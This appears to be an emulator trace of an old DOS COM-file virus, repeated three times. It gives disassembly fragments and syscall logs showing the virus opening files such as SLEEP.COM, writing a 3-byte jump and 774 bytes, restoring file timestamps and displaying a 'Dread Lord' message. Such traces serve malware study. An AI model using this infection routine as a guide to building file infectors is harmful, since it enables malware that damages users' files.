0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:10.895401318Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:10.904527362Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.906649219Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:10.909533211Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:10.910943126Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:10.557013823Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:10.558959856Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.560018743Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.561026362Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:10.564757281Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:10.571310384Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:10.585064855Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:10.597710885Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:10.604519772Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:10.606666563Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:10.63442665Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.642178686Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:10.645261317Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:10.648006658Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:10.650613009Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:10.659867123Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:10.662809403Z 62 PC: 12cad | Close file
2018-12-25T11:59:10.668977209Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.678970901Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.682575596Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.689249119Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.695742041Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.704990457Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.715935057Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.722505403Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.726211023Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.728308939Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.731125539Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.740620394Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.745221394Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.753101614Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.763176251Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.76709761Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.773781197Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.780203458Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.782700914Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.792893049Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.80018Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.804354782Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.806134111Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.808990415Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.817943601Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.819753912Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.827539314Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.838455832Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.841519129Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.848222002Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.85591801Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.858084452Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.868597877Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.876266965Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.87972583Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.881311105Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.884278558Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.894265459Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.896103466Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.904231995Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.915005234Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.918044854Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.92480124Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.932688645Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.934873396Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.939502973Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.945542921Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.948557603Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.950266551Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.954217578Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.968332761Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.970019006Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.972812408Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.977066433Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.979897476Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.991681474Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.999102597Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.001274373Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.01207455Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.019322791Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:11.022394506Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:11.024888061Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:11.028004787Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:11.043924335Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:11.045907041Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:11.05451631Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.064823656Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.067596533Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.0755683Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:11.082143693Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.084294879Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.095544822Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.102338578Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:11.105391626Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:11.108258296Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:11.111079289Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:11.119645095Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:11.122581139Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:11.131125913Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.140938325Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.144825609Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.151935201Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:11.158489655Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.160853284Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.163843539Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:11.16797447Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:11.171058351Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:11.180491241Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:11.181960777Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:11.18482596Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:11.186617277Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:10.624273076Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:10.626646737Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.628598298Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.630146178Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:10.633189068Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:10.64009605Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:10.653278066Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:10.666632149Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:10.674306359Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:10.676712284Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:10.696590635Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.70484677Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:10.708264123Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:10.710218689Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:10.714469689Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:10.725548927Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:10.727373288Z 62 PC: 12cad | Close file
2018-12-25T11:59:10.738761772Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.750243547Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.753667212Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.761464929Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.769094917Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.770492241Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.777666411Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.784149964Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.787799201Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.790290468Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.794632424Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.80565751Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.807734859Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.826404748Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.848743328Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.85269026Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.861346577Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.868748728Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.870932004Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.882336966Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.892367316Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.89615142Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.898375382Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.902868856Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.912728253Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.914907064Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.924809245Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.936531833Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.939679526Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.947883844Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.955583336Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.958050904Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.969787639Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.978487387Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.98195951Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.983937846Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.98805569Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.99765253Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.999710152Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:11.009600027Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.021096984Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.024086669Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.032364526Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:11.039773668Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.042081929Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.04799269Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.06087124Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:11.064443052Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:11.067019292Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:11.070460408Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:11.087040666Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:11.089309787Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:11.092729473Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.10842117Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.112043873Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.121149065Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:11.128765315Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.131314444Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.144131436Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.152601708Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:11.156289653Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:11.16028974Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:11.164289587Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:11.174864899Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:11.177925467Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:11.189212163Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.200556913Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.203880302Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.21168744Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:11.22687155Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.229526695Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.241540235Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.263890464Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:11.267302119Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:11.270240774Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:11.280017469Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:11.290609858Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:11.293350396Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:11.302032402Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.313365858Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.317471578Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.325797092Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:11.333372524Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.336153707Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.339684605Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:11.344808657Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:11.34772049Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:11.359860413Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:11.36165942Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:11.364170045Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:11.366389019Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:10.81711921Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:10.818750921Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.819830042Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.82080594Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:10.824356309Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:10.828187714Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:10.835244539Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:10.846788877Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:10.851620494Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:10.85320548Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:10.866608532Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.873723231Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:10.876443699Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:10.878855364Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:10.881459225Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:10.890751133Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:10.892412492Z 62 PC: 12cad | Close file
2018-12-25T11:59:10.900018556Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.910265841Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.91306288Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.923447474Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.939534721Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.942017272Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.970839379Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.978297594Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.981451595Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.985432828Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.988237234Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.997059877Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.999482923Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:11.007573082Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.017564641Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.021870179Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.028715286Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:11.035940095Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.03924019Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.050855323Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.057700307Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:11.060770676Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:11.062669314Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:11.065591727Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:11.075583578Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:11.086744807Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:11.118989307Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.129385333Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.132947009Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.139364716Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:11.145943746Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.148668199Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.158660683Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.165407614Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:11.169437435Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:11.171162591Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:11.173975134Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:11.183408344Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:11.185196529Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:11.192891956Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.203629835Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.206559315Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.213210977Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:11.220340852Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.222523002Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.227085507Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.233058607Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:11.23598641Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:11.237670816Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:11.241280288Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:11.255762688Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:11.257556633Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:11.260426232Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.266426206Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.269276841Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.276598521Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:11.283361228Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.285424734Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.295471267Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.303099839Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:11.306101Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:11.307739776Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:11.311499407Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:11.320384345Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:11.32211575Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:11.330652064Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.340426726Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.343135086Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.350777812Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:11.357144732Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.359723337Z 67 PC: 12cd9 | Get or set file attributes (See above)
